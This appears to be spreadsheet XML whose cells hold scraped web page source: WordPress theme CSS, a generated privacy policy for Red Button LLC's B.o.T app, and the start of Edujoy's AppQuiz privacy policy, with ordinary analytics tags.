600px){.wp-block-themeisle-blocks-advanced-columns{display:flex;position:relative}.wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap{display:flex;flex-basis:100%;word-break:keep-all;max-width:var(--columns-width)}.wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap .wp-block-themeisle-blocks-advanced-column{position:relative;flex:1}.wp-block-themeisle-blocks-advanced-columns.hide-in-mobile{display:none}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-mobile-oneTwo-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-mobile-twoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-mobile-oneOneTwo-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-mobile-twoOneOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-mobile-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-mobile-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex:1}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-mobile-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex:1}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-mobile-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex:3}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-mobile-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex:1}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-mobile-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex:1}.wp-block-themeisle-blocks-advanced-columns:not(.has-mobile-collapsedRows-layout).has-vertical-flex-start&gt;.innerblocks-wrap,.wp-block-themeisle-blocks-advanced-columns:not(.has-mobile-collapsedRows-layout).has-vertical-top&gt;.innerblocks-wrap{align-items:flex-start}.wp-block-themeisle-blocks-advanced-columns:not(.has-mobile-collapsedRows-layout).has-vertical-center&gt;.innerblocks-wrap{align-items:center}.wp-block-themeisle-blocks-advanced-columns:not(.has-mobile-collapsedRows-layout).has-vertical-flex-end&gt;.innerblocks-wrap,.wp-block-themeisle-blocks-advanced-columns:not(.has-mobile-collapsedRows-layout).has-vertical-bottom&gt;.innerblocks-wrap{align-items:flex-end}.wp-block-themeisle-blocks-advanced-columns.has-mobile-collapsedRows-layout&gt;.innerblocks-wrap{flex-direction:column}.wp-block-themeisle-blocks-advanced-columns.has-mobile-collapsedRows-layout.has-reverse-columns-mobile&gt;.innerblocks-wrap{flex-direction:column-reverse}.wp-block-themeisle-blocks-advanced-columns.has-mobile-twoColumnGrid-layout&gt;.innerblocks-wrap{display:flex;flex-wrap:wrap}.wp-block-themeisle-blocks-advanced-columns.has-mobile-twoColumnGrid-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex:1 1 40%}.wp-block-themeisle-blocks-advanced-columns.has-mobile-threeColumnGrid-layout&gt;.innerblocks-wrap{display:flex;flex-wrap:wrap}.wp-block-themeisle-blocks-advanced-columns.has-mobile-threeColumnGrid-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex:1 1 30%}}/*# sourceMappingURL=style.css.map */
&lt;/style&gt;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#9b51e0;--wp--preset--color--neve-link-color: var(--nv-primary-accent);--wp--preset--color--neve-link-hover-color: var(--nv-secondary-accent);--wp--preset--color--nv-site-bg: var(--nv-site-bg);--wp--preset--color--nv-light-bg: var(--nv-light-bg);--wp--preset--color--nv-dark-bg: var(--nv-dark-bg);--wp--preset--color--neve-text-color: var(--nv-text-color);--wp--preset--color--nv-text-dark-bg: var(--nv-text-dark-bg);--wp--preset--color--nv-c-1: var(--nv-c-1);--wp--preset--color--nv-c-2: var(--nv-c-2);--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: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42px;}.has-black-color{color: var(--wp--preset--color--black) !</t>
  </si>
  <si>
    <t>important;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='advanced-popups-css'  href='https://www.avazapp.com/wp-content/plugins/advanced-popups/public/css/advanced-popups-public.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-law-info-css'  href='https://www.avazapp.com/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-public.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-law-info-gdpr-css'  href='https://www.avazapp.com/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-gdpr.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='geotarget-css'  href='https://www.avazapp.com/wp-content/plugins/geotargeting/public/css/geotarget-public.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='redux-extendify-styles-css'  href='https://www.avazapp.com/wp-content/plugins/redux-framework/redux-core/assets/css/extendify-utilities.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='neve-style-css'  href='https://www.avazapp.com/wp-content/themes/neve/assets/css/style-legacy.min.css' type='text/css' media='all' /&gt;
&lt;style id='neve-style-inline-css' type='text/css'&gt;
.nv-meta-list li.meta:not(:last-child):after { content:"|" }.nv-meta-list .no-mobile{
			display:none;
		}.nv-meta-list li.last::after{
			content: ""!important;
		}@media (min-width: 769px) {
			.nv-meta-list .no-mobile {
				display: inline-block;
			}
			.nv-meta-list li.last:not(:last-child)::after {
		 		content: "|" ! important;
			}
		}
.header .builder-item [class*="button_base"] .button {box-shadow: var(--primarybtnshadow, none);} .header .builder-item [class*="button_base"] .button:hover {box-shadow: var(--primarybtnhovershadow, none);}
.nav-ul li .caret svg, .nav-ul li .caret img{width:var(--smiconsize, 0.5em);height:var(--smiconsize, 0.5em);}.nav-ul .sub-menu li {border-style: var(--itembstyle);}
 .container{ max-width: 748px; } .has-neve-button-color-color{ color: #39b061!important; } .has-neve-button-color-background-color{ background-color: #39b061!important; } .single-post-container .alignfull &gt; [class*="__inner-container"], .single-post-container .alignwide &gt;</t>
  </si>
  <si>
    <t>[class*="__inner-container"]{ max-width:718px } .button.button-primary, button, input[type=button], .btn, input[type="submit"], /* Buttons in navigation */ ul[id^="nv-primary-navigation"] li.button.button-primary &gt; a, .menu li.button.button-primary &gt; a, .wp-block-button.is-style-primary .wp-block-button__link, .wc-block-grid .wp-block-button .wp-block-button__link, form input[type="submit"], form button[type="submit"]{ background-color: #39b061;color: #ffffff;border-radius:3px 3px 3px 3px;border:none;border-width:1px 1px 1px 1px; } .button.button-primary:hover, ul[id^="nv-primary-navigation"] li.button.button-primary &gt; a:hover, .menu li.button.button-primary &gt; a:hover, .wp-block-button.is-style-primary .wp-block-button__link:hover, .wc-block-grid .wp-block-button .wp-block-button__link:hover, form input[type="submit"]:hover, form button[type="submit"]:hover{ background-color: var(--nv-primary-accent);color: #ffffff; } .button.button-secondary:not(.secondary-default), .wp-block-button.is-style-secondary .wp-block-button__link{ background-color: #39b061;color: #ffffff;border-radius:3px 3px 3px 3px;border:none;border-width:1px 1px 1px 1px; } .button.button-secondary.secondary-default{ background-color: #39b061;color: #ffffff;border-radius:3px 3px 3px 3px;border:none;border-width:1px 1px 1px 1px; } .button.button-secondary:not(.secondary-default):hover, .wp-block-button.is-style-secondary .wp-block-button__link:hover{ background-color: var(--nv-primary-accent);color: #ffffff; } .button.button-secondary.secondary-default:hover{ background-color: var(--nv-primary-accent);color: #ffffff; } body, .site-title{ font-size: 15px; font-weight: 500; font-family: Montserrat, var(--nv-fallback-ff); } h1, .single h1.entry-title{ font-size: 25px; line-height: 25px; letter-spacing: 0px; font-weight: 800; text-transform: none; font-family: Montserrat, var(--nv-fallback-ff); } h2{ font-size: 22px; line-height: 22px; letter-spacing: 0px; font-weight: 800; text-transform: none; font-family: Montserrat, var(--nv-fallback-ff); } h3, .woocommerce-checkout h3{ font-size: 20px; line-height: 33px; letter-spacing: 0px; font-weight: 800; text-transform: none; font-family: Montserrat, var(--nv-fallback-ff); } h4{ font-size: 13px; line-height: 1.6em; letter-spacing: 0px; font-weight: 800; text-transform: none; font-family: Montserrat, var(--nv-fallback-ff); } h5{ font-size: 16px; font-weight: 800; text-transform: none; font-family: Montserrat, var(--nv-fallback-ff); } h6{ font-size: 0.75em; font-weight: 800; text-transform: none; font-family: Montserrat, var(--nv-fallback-ff); } .nv-post-thumbnail-wrap img{ box-shadow:0 3px 6px -5px rgba(0, 0, 0, 0.1), 0 4px 8px rgba(0, 0, 0, 0.1); } form input:read-write, form textarea, form select, form select option, form.wp-block-sea</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;title&gt;Privacy Policy for B.o.T - FreePrivacyPolicy.com&lt;/title&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;link rel="stylesheet" type="text/css" href="/public/livelink/css/livelink.css" /&gt;
&lt;meta name="robots" content="noindex" /&gt;
&lt;meta property="og:title" content="Privacy Policy for B.o.T - FreePrivacyPolicy.com" /&gt;
&lt;meta property="og:image" content="https://www.freeprivacypolicy.com/public/images/meta_og_image_livelink.png" /&gt;
&lt;meta property="og:image:width" content="1280" /&gt;
&lt;meta property="og:image:height" content="720" /&gt;
&lt;meta property="og:url" content="https://www.freeprivacypolicy.com/live/688f3072ec67d69014a2a52fd9c9777c" /&gt;
&lt;meta property="og:site_name" content="FreePrivacyPolicy.com" /&gt;
&lt;link rel="canonical" href="https://www.freeprivacypolicy.com/live/688f3072ec67d69014a2a52fd9c9777c" /&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-QSMNQ8CKJG"&gt;&lt;/script&gt;
&lt;script&gt;
     window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t>[];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'G-QSMNQ8CKJG');
    &lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class="page"&gt;
&lt;div class="header"&gt;
&lt;div class="container"&gt;
&lt;p class="title"&gt;Privacy Policy for B.o.T&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="translations-content-container"&gt;
&lt;div class="container"&gt;
&lt;div class="tab-content translations-content-item en visible" id="en"&gt;
&lt;h1&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt;Effective date: October 26, 2018&lt;/p&gt;
&lt;p&gt;Red Button LLC (&amp;quot;us&amp;quot;, &amp;quot;we&amp;quot;, or &amp;quot;our&amp;quot;) operates the B.o.T mobile application (hereinafter referred to as the &amp;quot;Service&amp;quot;).&lt;/p&gt;
&lt;p&gt; This page informs you of our policies regarding the collection, use and disclosure of personal data when you use our Service and the choices you have associated with that data. This Privacy Policy is managed by &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use your data to provide and improve the Service. By using the Service, you agree to the collection and use of information in accordance with this policy. Unless otherwise defined in this Privacy Policy, the terms used in this Privacy Policy have the same meanings as in our Terms and Conditions.&lt;/p&gt;
&lt;h2&gt;Definitions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Service&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Service is the B.o.T mobile application operated by Red Button</t>
  </si>
  <si>
    <t>LLC&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Personal Data&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Personal Data means data about a living individual who can be identified from those data (or from those and other information either in our possession or likely to come into our possession).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Usage Data&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Usage Data is data collected automatically either generated by the use of the Service or from the Service infrastructure itself (for example, the duration of a page visit).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Cookies are small files stored on your device (computer or mobile device).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Information Collection and Use&lt;/h2&gt;
&lt;p&gt; We collect several different types of information for various purposes to provide and improve our Service to you.&lt;/p&gt;
&lt;h3&gt;Types of Data Collected&lt;/h3&gt;
&lt;h4&gt;Personal Data&lt;/h4&gt;
&lt;p&gt;While using our Service, we may ask you to provide us with certain personally identifiable information that can be used to contact or identify you (&amp;quot;Personal Data&amp;quot;).</t>
  </si>
  <si>
    <t>Personally identifiable information may include, but is not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cookies and Usage Data&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Usage Data&lt;/h4&gt;
&lt;p&gt;When you access the Service with a mobile device, we may collect certain information automatically, including, but not limited to, the type of mobile device you use, your mobile device unique ID, the IP address of your mobile device, your mobile operating system, the type of mobile Internet browser you use, unique device identifiers and other diagnostic data (&amp;quot;Usage Data&amp;quot;).&lt;/p&gt;
 &lt;h4&gt;Tracking &amp;amp; Cookies Data&lt;/h4&gt;
&lt;p&gt;We use cookies and similar tracking technologies to track the activity on our Service and we hold certain information.
 Cookies are files with a small amount of data which may include an anonymous unique identifier.</t>
  </si>
  <si>
    <t>Cookies are sent to your browser from a website and stored on your device. Other tracking technologies are also used such as beacons, tags and scripts to collect and track information and to improve and analyse our Service.
 You can instruct your browser to refuse all cookies or to indicate when a cookie is being sent.</t>
  </si>
  <si>
    <t>However, if you do not accept cookies, you may not be able to use some portions of our Service.
 Examples of Cookies we use:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Session Cookies.&lt;/strong&gt; We use Session Cookies to operate our Service.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Preference Cookies.&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We use Preference Cookies to remember your preferences and various settings.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Security Cookies.&lt;/strong&gt; We use Security Cookies for security purposes.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Use of Data&lt;/h2&gt;
&lt;p&gt;Red Button LLC uses the collected data for various purposes:&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;ul&gt;
&lt;li&gt;To provide and maintain our Service&lt;/li&gt;
&lt;li&gt;To notify you about changes to our Service&lt;/li&gt;
&lt;li&gt;To allow you to participate in interactive features of our Service when you choose to do so&lt;/li&gt;
&lt;li&gt;To provide customer support&lt;/li&gt;
&lt;li&gt;To gather analysis or valuable information so that we can improve our Service&lt;/li&gt;
&lt;li&gt;To monitor the usage of our Service&lt;/li&gt;
&lt;li&gt;To detect, prevent and address technical issues&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Transfer of Data&lt;/h2&gt;
&lt;p&gt;Your information, including Personal Data, may be transferred to - and maintained on - computers located outside of your state, province, country or other governmental jurisdiction where the data protection laws may differ from those of your jurisdiction.&lt;/p&gt;
&lt;p&gt;If you are located outside and choose to provide information to us, please note that we transfer the data, including Personal Data, to and process it there.&lt;/p&gt;
&lt;p&gt;Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.&lt;/p&gt;
&lt;p&gt;Red Button LLC will take all the steps reasonably necessary to ensure that your data is treated securely and in accordance with this Privacy Policy and no transfer of your Personal Data will take place to an organisation or a country unless there are adequate controls in place including the security of your data and other personal information.&lt;/p&gt;
&lt;h2&gt;Disclosure of Data&lt;/h2&gt;
&lt;h3&gt; Legal Requirements&lt;/h3&gt;
&lt;p&gt; Red Button LLC may disclose your Personal Data in the good faith belief that such action is necessary to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;To comply with a legal obligation&lt;/li&gt;
&lt;li&gt;To protect and defend the rights or property of Red Button LLC&lt;/li&gt;
&lt;li&gt;To prevent or investigate possible wrongdoing in connection with the Service&lt;/li&gt;
&lt;li&gt;To protect the personal safety of users of the Service or the public&lt;/li&gt;
&lt;li&gt;To protect against legal liability&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Security of Data&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The security of your data is important to us but remember that no method of transmission over the Internet or method of electronic storage is 100% secure. While we strive to use commercially acceptable means to protect your Personal Data, we cannot guarantee its absolute security.&lt;/p&gt;
&lt;h2&gt; Service Providers&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We may employ third party companies and individuals to facilitate our Service (&amp;quot;Service Providers&amp;quot;), provide the Service on our behalf, perform Service-related services or assist us in analysing how our Service is used.
 These third parties have access to your Personal Data only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.&lt;/p&gt;
&lt;h3&gt;Analytics&lt;/h3&gt;
&lt;p&gt;We may use third-party Service Providers to monitor and analyse the use of our Service.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Firebase&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Firebase is an analytics service provided by Google Inc.&lt;/p&gt;
&lt;p&gt;You may opt-out of certain Firebase features through your mobile device settings, such as your device advertising settings or by following the instructions provided by Google in their Privacy Policy: &lt;a href="https://policies.google.com/privacy" rel="external nofollow noopener" target="_blank"&gt;https://policies.google.com/privacy&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;We also encourage you to review the Google's policy for safeguarding your data: &lt;a href="https://support.google.com/analytics/answer/6004245" rel="external nofollow noopener" target="_blank"&gt;https://support.google.com/analytics/answer/6004245&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;For more information on what type of information Firebase collects, please visit the Google Privacy &amp;amp; Terms web page: &lt;a href="https://policies.google.com/privacy" rel="external nofollow noopener" target="_blank"&gt;https://policies.google.com/privacy&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Links to Other Sites&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Our Service may contain links to other sites that are not operated by us. If you click a third party link, you will be directed to that third party's site. We strongly advise you to review the Privacy Policy of every site you visit.
</t>
  </si>
  <si>
    <t>We have no control over and assume no responsibility for the content, privacy policies or practices of any third party sites or services.&lt;/p&gt;
&lt;h2&gt; Children's Privacy&lt;/h2&gt;
&lt;p&gt;Our Service does not address anyone under the age of 18 (&amp;quot;Children&amp;quot;).&lt;/p&gt;
&lt;p&gt; We do not knowingly collect personally identifiable information from anyone under the age of 18.</t>
  </si>
  <si>
    <t>If you are a parent or guardian and you are aware that your Child has provided us with Personal Data, please contact us. If we become aware that we have collected Personal Data from children without verification of parental consent, we take steps to remove that information from our servers.&lt;/p&gt;
&lt;h2&gt; Changes to This Privacy Policy&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We may update our Privacy Policy from time to time. We will notify you of any changes by posting the new Privacy Policy on this page.
 We will let you know via email and/or a prominent notice on our Service, prior to the change becoming effective and update the &amp;quot;effective date&amp;quot; at the top of this Privacy Policy.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>You are advised to review this Privacy Policy periodically for any changes. Changes to this Privacy Policy are effective when they are posted on this page.&lt;/p&gt;
&lt;h2&gt;Contact Us&lt;/h2&gt;
&lt;p&gt;If you have any questions about this Privacy Policy, please contact us:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;By email: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="61121411110e131521030015150d04150815000f124f080e"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="footer"&gt;
&lt;div class="container"&gt;
&lt;p&gt;Generated using &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Free Privacy Policy Generator&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;
    const tabLinks = Array.from(document.querySelectorAll(".tab-link"));
    const tabContents = document.querySelectorAll(".tab-content");
    tabLinks.forEach(function(tabLink) {
        tabLink.addEventListener("click", toggleTab);
    });
    let priorActiveTab = null;
    function toggleTab(event) {
        tabLinks.forEach(function(tabLink, index){
            tabLink.classList.remove("active");
            tabLink.classList.add("inactive");
            tabContents[index].classList.remove("visible");
            tabContents[index].classList.add("hidden");
        });
        if(priorActiveTab === this) {
            this.classList.remove("active");
            this.classList.add("inactive");
            tabContents[tabLinks.indexOf(this)].classList.remove("visible");
            tabContents[tabLinks.indexOf(this)].classList.add("hidden");
            priorActiveTab = null;
        } else {
            this.classList.remove("inactive");
            this.classList.add("active");
            tabContents[tabLinks.indexOf(this)].classList.remove("hidden");
            tabContents[tabLinks.indexOf(this)].classList.add("visible");
            priorActiveTab = this;
        }
        if (priorActiveTab === null) {
            this.classList.remove("inactive");
            this.classList.add("active");
            tabContents[tabLinks.indexOf(this)].classList.remove("hidden");
            tabContents[tabLinks.indexOf(this)].classList.add("visible");
        }
        event.preventDefault();
    }
&lt;/script&gt;
&lt;script type="text/javascript"&gt;
    "use strict";
    window. LCG_TRACKING_APPLICATION = "freeprivacypolicy-livelink";
    window.</t>
  </si>
  <si>
    <t>LCG_TRACKING_ENVIRONMENT = "production";
    window. LCG_TRACKING_EPOCH = "2020-e01";
&lt;/script&gt;
&lt;script src="/track/v1/r/js-code" type="text/javascript" async="true"&gt;&lt;/script&gt;
&lt;script src="/track/v1/r/js-data" type="text/javascript" async="true"&gt;&lt;/script&gt;
&lt;img src="/track/v1/px" style="position:fixed;right:0px;bottom:0px;display:none;" /&gt;
&lt;script defer src="https://static.cloudflareinsights.com/beacon.min.js/v2b4487d741ca48dcbadcaf954e159fc61680799950996" integrity="sha512-D/jdE0CypeVxFadTejKGTzmwyV10c1pxZk/AqjJuZbaJwGMyNHY3q/mTPWqMUnFACfCTunhZUVcd4cV78dK1pQ==" data-cf-beacon='{"rayId":"7b6f0d4edfc76380","version":"2023.3.0","b":1,"token":"dd281d4ac6a447be928fcee1746ec801","si":100}' crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html&gt;_x005F_x000D_
_x005F_x000D_
&lt;head&gt;_x005F_x000D_
_x005F_x000D_
    &lt;meta charset="utf-8"&gt; _x005F_x000D_
    &lt;title&gt;Privacy Policy · Edujoy Educational Games&lt;/title&gt;_x005F_x000D_
    &lt;meta name="Description" content="Educational mobile games and apps for children and kids"&gt;_x005F_x000D_
    &lt;meta name="Keywords" content="games, game, app, education, educational, kids, children, baby, learn"&gt;_x005F_x000D_
    &lt;meta name="author" content="edujoygames.com"&gt;      _x005F_x000D_
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
    &lt;!-- Favicon --&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="57x57" href="img/favicon/apple-icon-57x57.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="60x60" href="img/favicon/apple-icon-60x60.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="72x72" href="img/favicon/apple-icon-72x72.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="76x76" href="img/favicon/apple-icon-76x76.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="114x114" href="img/favicon/apple-icon-114x114.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="120x120" href="img/favicon/apple-icon-120x120.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="144x144" href="img/favicon/apple-icon-144x144.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="152x152" href="img/favicon/apple-icon-152x152.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="180x180" href="img/favicon/apple-icon-180x180.png"&gt;_x005F_x000D_
    &lt;link rel="icon" type="image/png" sizes="192x192"  href="img/favicon/android-icon-192x192.png"&gt;_x005F_x000D_
    &lt;link rel="icon" type="image/png" sizes="32x32" href="img/favicon/favicon-32x32.png"&gt;_x005F_x000D_
    &lt;link rel="icon" type="image/png" sizes="96x96" href="img/favicon/favicon-96x96.png"&gt;_x005F_x000D_
    &lt;link rel="icon" type="image/png" sizes="16x16" href="img/favicon/favicon-16x16.png"&gt;_x005F_x000D_
    &lt;link rel="manifest" href="img/favicon/manifest.json"&gt;_x005F_x000D_
    &lt;meta name="msapplication-TileColor" content="#ffffff"&gt;_x005F_x000D_
    &lt;meta name="msapplication-TileImage" content="img/favicon/ms-icon-144x144.png"&gt;_x005F_x000D_
    &lt;meta name="theme-color" content="#ffffff"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- CSS main-top --&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="style.css"&gt;_x005F_x000D_
_x005F_x000D_
    _</t>
  </si>
  <si>
    <t>x000D_
&lt;/head&gt;_x005F_x000D_
 _x005F_x000D_
&lt;body id="body" class="simple"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;nav id="main-nav"&gt;_x005F_x000D_
        &lt; a href="/" class="logo_s"&gt;&lt;img src="img/edujoy_logo_s.png" alt="Edujoy" /&gt;&lt;/a&gt;_x005F_x000D_
_x005F_x000D_
        &lt;input class="menu-btn" type="checkbox" id="menu-btn" /&gt;_x005F_x000D_
        &lt;label class="menu-icon" for="menu-btn"&gt;&lt;span class="nav-icon"&gt;&lt;/span&gt;&lt;/label&gt;_x005F_x000D_
_x005F_x000D_
        &lt;ul&gt;_x005F_x000D_
            &lt;li&gt;&lt;a href="/"&gt;Home&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
            &lt;li&gt;&lt;a href="about-us"&gt;About us&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
            &lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="educational-games-kids"&gt;Educational Games&lt;/a&gt;&lt;/li&gt;   _x005F_x000D_
            &lt;li&gt;&lt;a href="edujoy-digital-school"&gt;Edujoy Digital School&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
            &lt;li&gt;&lt;a href="become-tester"&gt;Become a tester&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
            &lt;li&gt;&lt;a href="join-us-jobs"&gt;Join us&lt;/a&gt;&lt;/li&gt;     _x005F_x000D_
            &lt;li&gt;&lt;a href="contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
        &lt;/ul&gt;_x005F_x000D_
    &lt;/nav&gt;_x005F_x000D_
_x005F_x000D_
        _ x000D_
    &lt;header id="main-header"&gt;  _x005F_x000D_
        &lt;a href="/" class="logo"&gt;&lt;img src="img/edujoy_logo.png" alt="Edujoy" /&gt;&lt;/a&gt;_x005F_x000D_
    &lt;/header&gt;_x005F_x000D_
_x005F_x000D_
    &lt;div id="content"&gt;_x005F_x000D_
        &lt;main id="policy"&gt;        _x005F_x000D_
            &lt;section id="policy-intro"&gt;  _x005F_x000D_
                &lt;div class="block"&gt;     _x005F_x000D_
                    &lt;h1&gt;Privacy Policy&lt;br/&gt;&lt;span&gt;AppQuiz - Edujoy&lt;/span&gt;&lt;/h1&gt;  _x005F_x000D_
                    _x005F_x000D_
                    _x005F_x000D_
                    &lt;p&gt;As a company based in Spain with global operations, we strictly comply with Spanish privacy laws, but we also strive to comply with the best practices worldwide. This privacy policy sets out how we handle your privacy.</t>
  </si>
  <si>
    <t>By accessing our website and installing our mobile apps, the user agrees with the practices laid down in this privacy policy.&lt;/p&gt; _x005F_x000D_
_x005F_x000D_
                    &lt;p&gt; This privacy policy has been prepared based on provisions of multiple legislations, including Art. 13/14 of Regulation (EU) 2016/679 (General Data Protection Regulation).&lt;/p&gt;_x005F_x000D_
                   _ x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/section&gt;_x005F_x000D_
_x005F_x000D_
            &lt;section class="pre-footer privacy" id="lista"&gt;  _x005F_x000D_
                &lt;div class="block"&gt; _x005F_x000D_
                    &lt;</t>
  </si>
  <si>
    <t>ul&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;h2&gt;Automatic Database of Personal Information&lt;/h2&gt;_x005F_x000D_
                            &lt;p&gt;By agreeing to this Privacy Policy, the user manifests knowledge of the database and consents to the automatic handling of the user's data.&lt;/p&gt;  _x005F_x000D_
                            &lt;p&gt;Edujoy Entertainment (EDUJOY APPQUIZ) respects the privacy rights and data protection of its users and recognizes the importance of protecting their collected personal information.&lt;/p&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
_x005F_x000D_
